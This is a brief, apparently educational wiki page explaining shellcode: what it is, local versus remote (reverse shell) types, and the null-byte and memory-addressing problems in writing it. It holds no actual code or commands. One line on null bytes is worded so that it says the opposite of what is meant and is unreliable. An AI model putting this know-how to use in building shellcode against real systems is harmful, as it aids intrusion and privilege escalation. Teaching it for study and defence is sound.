Shellcode (eng)

From FdIwiki ELP
Jump to: navigation, search


Is a code prepared to be injected and executed directly in memory during the execution of a trouble, throught the use of some vulnerabilities found in the software.

When we program it, we must pay special attention to optimization and size, because the slot that we have to fix it is normally quite limited.

Generally, it’s used for the tarjet of executing a shell with root (admin), manage files of users and passwords (modify passwords, add users with privileges,...), …

Types of shellcode

  • Local: that doesnt establish a connection, using only for local purpose on the affected machine. An example, the multiple shellcode that would allow privilege escalation.
  • Remote: after shellcode execution originates a connection (both directions) to attacker machine. An example, generate a reverse shell from the exploited machine to the attacking machine.

Troubles when programming shellcode

Apart from the space occupied by shellcode, there are two points that we must keep in mind. Null bytes (Null Byte Problem) and the addressing of memory (Addressing Problem).

  • Null Byte Problem: The most common way to inject our shellcode is through functions used for string operations. These functions finish if they find a null byte (0x00), so we will be careful to have in our shellcode one of these bytes, because execution finish and our objective will not be achieved.
  • Addressing problem: we want to inject our code into a program when its launched, so we must know first the memory addresses of the elements we will use.

Interesting tools